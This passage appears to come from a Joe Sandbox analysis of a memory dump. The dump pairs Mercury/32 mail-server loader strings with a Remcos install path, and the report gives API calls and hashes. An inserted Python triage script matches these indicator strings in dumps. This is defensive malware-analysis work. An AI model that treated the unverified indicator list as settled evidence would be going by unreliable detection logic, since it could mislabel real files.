• There is already a copy of Mercury/32 running from this directory.Only one copy may be run at a time from any given install directory., xrefs: 004019B3
• Mercury/32 Loader shutting down., xrefs: 00401C93
• Mercury/32 Loader Started, xrefs: 0040192A
• Multiple sessions from the same install directory detected - terminating, xrefs: 004019BF
• %s\m32.run, xrefs: 00401BB7
• W, xrefs: 00401B59
• Normal operation restored - resetting counters., xrefs: 00401B93
• Loader encountered Windows error %d creating Mercury/32 process., xrefs: 00401AD8
• Mercury/32 Loader Error, xrefs: 004019AE
• %s\mercury.exe -E, xrefs: 004019E8
• Abnormal terminations continued after attempted recovery - exiting., xrefs: 00401C59
• mercury32.pmail.com.run.%.60s, xrefs: 0040193C
• Restarting Mercury after apparent abnormal termination, xrefs: 00401C2F
• Restarting Mercury after scheduled daily exit, xrefs: 00401C21
Memory Dump Source
• Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_remcos.jbxd
Similarity
• API ID: Open$BuffCharCloseFileHandleLowerModuleNameSemaphorelstrlen
• String ID: %s\m32-ssu.run$%s\m32.run$%s\mercury.exe -E$:\/$Abnormal terminations continued after attempted recovery - exiting.$C:\ProgramData\Remcos$D$Loader encountered Windows error %d creating Mercury/32 process.$Mercury/32 Loader Error$Mercury/32 Loader Started$Mercury/32 Loader shutting down.$Multiple sessions from the same install directory detected - terminating$Normal operation restored - resetting counters.$Recovery complete - attempting to restart Mercury.$Restarting Mercury after apparent abnormal termination$Restarting Mercury after scheduled daily exit$There is already a copy of Mercury/32 running from this directory.Only one copy may be run at a time from any given install directory.$Too many abnormal terminations in time period - attempting recovery.$W$mercury32.pmail.com.run.%.60s
• API String ID: 527459832-1550949876
• Opcode ID: 21806626913b0df371d69415627cef80720bedf28f1a3404ab7f6c3db0ba0880
• Instruction ID: 9b5fbd67cbc3e190377a54b581c7df8cf1cf74e5fc47f7b393678a9f4ffd1dd2
• Opcode Fuzzy Hash: 21806626913b0df371d69415627cef80720bedf28f1a3404ab7f6c3db0ba0880
• Instruction Fuzzy Hash: 82A19AB19443196ADB10E7A18C43FEA73789F44704F1045BFF644B61D2EBBC96888EAD
Uniqueness

Uniqueness Score: -1.00%

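The two functions above (the `Loader.Log` writer that opens `Software\Mercury32` under hive handle 80000000, i.e. HKEY_CLASSES_ROOT, and reads `BaseDir`; and the watchdog loop that opens the `mercury32.pmail.com.run.%.60s` semaphore, launches `%s\mercury.exe -E` with CreateProcessA and restarts it after an abnormal exit) carry the string set of the Mercury/32 mail server's loader, yet the same dump (snapshot hcaresult_7_2_400000_remcos.jbxd, process 7) also references `C:\ProgramData\Remcos`. When triaging other dumps, the check a practitioner wants is the co-occurrence of both families, since the loader strings on their own also match the legitimate product. The Python below is an added example, not code from the Joe Sandbox report, from Remcos or from Mercury/32: it extracts printable ASCII strings from a raw dump and scores them against the indicator strings listed in the report. The co-occurrence rule, the minimum string length of 6, the threshold of three loader strings and the sample dump are this example's own assumptions and constructions.

```python
"""Offline triage for the Mercury/32-loader + Remcos indicator set seen in this report.

Added example, not part of the Joe Sandbox report or of any Remcos/Mercury code.
It extracts printable ASCII strings from a raw dump (the way `strings -n` would)
and scores them against the two indicator families visible in the report: the
Mercury/32 loader's own strings (registry key, log format, semaphore name,
watchdog messages) and the Remcos install path. The co-occurrence rule and the
minimum string length are assumptions of this example, not something the report states.
"""
import re
from typing import Dict, List

# Strings taken from the "Strings" / "String ID" fields of the report above.
MERCURY_LOADER_STRINGS = [
    rb"Software\Mercury32",
    rb"BaseDir",
    rb"%s\Loader.Log",
    rb"%02d-%02d-%02d.%02d%02d: %s",
    rb"mercury32.pmail.com.run.%.60s",
    rb"%s\mercury.exe -E",
    rb"%s\m32.run",
    rb"%s\m32-ssu.run",
    rb"Mercury/32 Loader Started",
    rb"Mercury/32 Loader shutting down.",
    rb"Restarting Mercury after apparent abnormal termination",
]
REMCOS_PATH_STRINGS = [rb"C:\ProgramData\Remcos"]

# Printable ASCII runs of at least MIN_LEN bytes (assumed threshold, like `strings -n 6`).
MIN_LEN = 6
_ASCII_RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)


def extract_strings(blob: bytes) -> List[bytes]:
    """Return every printable-ASCII run of MIN_LEN or more bytes in the dump."""
    return _ASCII_RUN.findall(blob)


def match_indicators(blob: bytes) -> Dict[str, List[str]]:
    """Map each indicator family to the indicator strings present in the dump.

    Indicators are matched as substrings of extracted strings, so a hit inside a
    longer string (e.g. the path embedded in a larger message) still counts.
    """
    found = extract_strings(blob)
    hits: Dict[str, List[str]] = {"mercury_loader": [], "remcos_path": []}
    for family, needles in (("mercury_loader", MERCURY_LOADER_STRINGS),
                            ("remcos_path", REMCOS_PATH_STRINGS)):
        for needle in needles:
            if any(needle in s for s in found):
                hits[family].append(needle.decode("ascii"))
    return hits


def verdict(blob: bytes, min_loader_hits: int = 3) -> str:
    """Classify a dump by which indicator families are present.

    'repurposed_mercury_loader': loader strings AND the Remcos path co-occur, the
    pattern of the process-7 dump in this report (the label is this example's
    assumption; the report itself only lists the strings).
    'mercury_loader_only': looks like the stock loader, no Remcos path.
    'remcos_path_only' / 'no_match': partial or no evidence.
    """
    hits = match_indicators(blob)
    loader = len(hits["mercury_loader"]) >= min_loader_hits
    remcos = bool(hits["remcos_path"])
    if loader and remcos:
        return "repurposed_mercury_loader"
    if loader:
        return "mercury_loader_only"
    if remcos:
        return "remcos_path_only"
    return "no_match"


# Constructed sample dump (not a real memory dump): strings from the report
# interleaved with binary filler, to exercise the extraction step.
SAMPLE_DUMP = (
    b"\x00\x01\x02" + b"Mercury/32 Loader Started\x00"
    + b"\xff" * 9 + b"Software\\Mercury32\x00BaseDir\x00"
    + b"\x90\x90" + b"%s\\mercury.exe -E\x00"
    + b"\x00" * 4 + b"C:\\ProgramData\\Remcos\x00"
    + b"%02d-%02d-%02d.%02d%02d: %s\x00%s\\Loader.Log\x00"
)

if __name__ == "__main__":
    print(verdict(SAMPLE_DUMP), match_indicators(SAMPLE_DUMP))
```

Run against a real `.sdmp` or process dump by passing its bytes to `verdict()`; lower `min_loader_hits` if the dump is partial, since a single hit on a generic string such as `BaseDir` is not evidence on its own.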
                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 128 401000-40101d 129 401024-40b536 call 40229f GetModuleHandleA call 40799c call 407e34 call 404e08 call 4024e4 GetEnvironmentStrings GetCommandLineA call 40ab2c call 40b360 128->129 130 40101f-401022 128->130 146 40b580-40b593 call 40b368 129->146 147 40b538-40b542 129->147 130->129 152 40b595-40b599 146->152 153 40b57e 146->153 148 40b546-40b555 call 40b368 147->148 157 40b544 148->157 158 40b557-40b55f 148->158 155 40b59b-40b5a1 152->155 156 40b5fe-40b61e call 40aa78 152->156 153->146 159 40b5a4-40b5a8 155->159 173 40b61f-40b625 156->173 157->148 160 40b575-40b57a 158->160 161 40b5a3 159->161 162 40b5aa-40b5ac 159->162 164 40b561-40b572 160->164 165 40b57c 160->165 161->159 162->161 166 40b5ae-40b5b1 162->166 164->160 165->146 168 40b5b3-40b5b6 166->168 169 40b5b8-40b5ba 166->169 172 40b5bd-40b5c1 168->172 169->172 174 40b5c3-40b5c5 172->174 175 40b5cb-40b5ce 172->175 174->175 176 40b5c7-40b5c9 174->176 177 40b5d0-40b5d1 175->177 178 40b5d4-40b5d8 175->178 176->175 181 40b5bc 176->181 177->178 179 40b5da-40b5dc 178->179 180 40b5de-40b5e0 178->180 179->180 182 40b5d3 179->182 180->182 183 40b5e2-40b5f6 GetModuleHandleA call 4018ae call 40aa78 180->183 181->172 182->178 186 40b5fb-40b5fc 183->186 186->173
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,0040D0D4), ref: 00401035
                                                                                        • GetEnvironmentStrings.KERNEL32 ref: 0040B514
                                                                                        • GetCommandLineA.KERNEL32 ref: 0040B51E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_400000_remcos.jbxd
                                                                                        Similarity
                                                                                        • API ID: CommandEnvironmentHandleLineModuleStrings
                                                                                        • String ID: C:\ProgramData\Remcos$`6g
                                                                                        • API String ID: 1584138308-4140288315
                                                                                        • Opcode ID: 5af8f9c36be296b6b91c95da3a50d919bc7001994e3f0b2d056ede415890b488
                                                                                        • Instruction ID: 1e125b975a801eda77775a79630f441c36246d9b4f70de590b5ee850b0935413
                                                                                        • Opcode Fuzzy Hash: 5af8f9c36be296b6b91c95da3a50d919bc7001994e3f0b2d056ede415890b488
                                                                                        • Instruction Fuzzy Hash: C8413670904304ABDB209F69DC86B6637A5EB4530CF2441BBE645BB3D2DB789842C7DE
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph not reproduced): blocks 40ae18-40ae4e, calls 409ff8 and 40a87c, GetModuleFileNameA
APIs
• GetModuleFileNameA.KERNEL32(00000000,01F720A0,000000FF), ref: 0040AE48
Strings
• Out of memory in _setargv0, xrefs: 0040AE30
Memory Dump Source
• Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_remcos.jbxd
Similarity
• API ID: FileModuleName
• String ID: Out of memory in _setargv0
• API String ID: 514040917-2942948061
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph not reproduced): block 40b690-40b6a7, TlsFree * 2
APIs
• TlsFree.KERNEL32(00000002), ref: 0040B696
• TlsFree.KERNEL32(00000003,00000002), ref: 0040B6A2
Memory Dump Source
• Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_remcos.jbxd
Similarity
• API ID: Free
• String ID:
• API String ID: 3978063606-0
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph not reproduced): blocks 4068e0-406963, calls 406714, 406398, 406780 and 40642c, SetFilePointer
Memory Dump Source
• Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_remcos.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph not reproduced): block 4068c8-4068de, GetFileType
APIs
• GetFileType.KERNEL32(0040B91F,?,00406B17,00000000,?,80000000,?,0000000C,00000005,00000000,00000000,?,0040B91F,0040B91F,?), ref: 004068CF
Memory Dump Source
• Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_remcos.jbxd
Similarity
• API ID: FileType
• String ID:
• API String ID: 3081899298-0
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph not reproduced): block 40a2f8-40a30f, GlobalMemoryStatus
APIs
• GlobalMemoryStatus.KERNEL32 ref: 0040A303
Memory Dump Source
• Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_remcos.jbxd
Similarity
• API ID: GlobalMemoryStatus
• String ID:
• API String ID: 1890195054-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• CloseHandle.KERNEL32(00000000,00000000,?,0040A949,00000000,?,?,?,?,?,?,0040B91F,Semaphore error ,?), ref: 00406861
Memory Dump Source
• Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_remcos.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_remcos.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_remcos.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_remcos.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_remcos.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_remcos.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%